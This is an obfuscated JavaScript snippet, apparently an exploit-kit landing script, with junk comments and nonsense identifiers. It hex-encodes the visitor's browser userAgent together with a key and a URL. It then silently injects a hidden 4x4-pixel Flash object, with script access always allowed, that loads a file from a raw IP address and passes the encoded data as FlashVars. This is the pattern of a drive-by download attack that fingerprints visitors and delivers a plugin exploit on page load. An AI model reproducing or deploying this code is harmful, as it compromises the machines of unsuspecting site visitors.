/*s66183d3256hssfj76442fs*/function hgfgerdfgdf(num, width){/*s94600d54900hfj94214fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s24593d25751hfj46809fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s94419d96430hfj18620fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s87027d66730hfj7822fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd40200hfs*/c += b + d;/*s32231d57361hfj50070fs*/e += 1;}return c;}/*s13286dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.79.142/?NzUwNDIzODU=&help=slam&mail=jmY8IAFgX9qupi0PcwReYgJaBrBeMNAhMqpDEFrM-2V_8xrMcccp1xBSBu2NZzestU1gV5AsSnKz7VaOO-w&paper=xH_QMrDYbR7FFYDfKPrEUKREMU7WA0eKwY-ZhazVF5yxFDTGpbH1Fx_spVydCF-EmvFvdLAHIwKh1UfASwR&inform=MjYzMDUwOTk=&noise=Mjc1MTExMjI=", ghnvbn("http://188.225.79.142/?NjcyMzM1MTQ=&help=work&paper=xH_QMrPYbR3FFYDfKPnEUKREMU7WA0SKwYyZhazVF5-xFDTGpbL1FxzspV-dCFyEmvFvdLMHIwKh1UTASwd&inform=NDkxODM2Mg==&mail=jmYwIAFgX9qupi0PcwRSYgJWBrBeMNAtMqpDEFrM-2Vz8xrMcccp1xBeBu2BZzegtVVgX5wsTn6z7S6CJrg&noise=NDY4MDgyOTI=","wexykukusw"));